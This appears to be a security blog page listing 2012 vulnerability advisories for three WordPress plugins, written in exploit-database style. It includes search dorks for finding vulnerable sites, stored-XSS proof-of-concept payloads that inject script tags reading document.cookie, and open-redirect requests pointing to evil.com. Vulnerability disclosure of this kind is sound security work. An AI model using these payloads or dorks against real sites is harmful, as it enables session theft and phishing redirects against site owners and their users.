Welcome to Cloudberry Engineering
a notebook on building, breaking and securing systems by Gianluca Brindisi.
  • What's New in xsssniper 0.8.x
  • WordPress Mingle Forum <= 1.0.32.1 Multiple Vulnerabilities 
  • # Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18 
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01

    Vulnerability

    You need permissions to write a post (HTML mode) to exploit the shortcode:

    [redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']
    # / #wordpress #advisory #stored-xss 
  • # Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

    Vulnerability

    You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages:

    • Name field is not sanitized and it’s injectable with a payload which will be stored in the pending submission page in admin panel POC: myname’"><script>window.alert(document.cookie)</script>

    • Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: my@mail.com’"><script>window.alert(document.cookie)</script>

    • Post Title is not sanitized and it’s injectable with a payload which will be stored in the pending submissions page in admin panel POC: title’"><script>window.alert(document.cookie)</script>

    # / #wordpress #advisory #stored-xss 
  • # Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

    1. Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com

    2. Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com

    # / #wordpress #advisory #open-redirect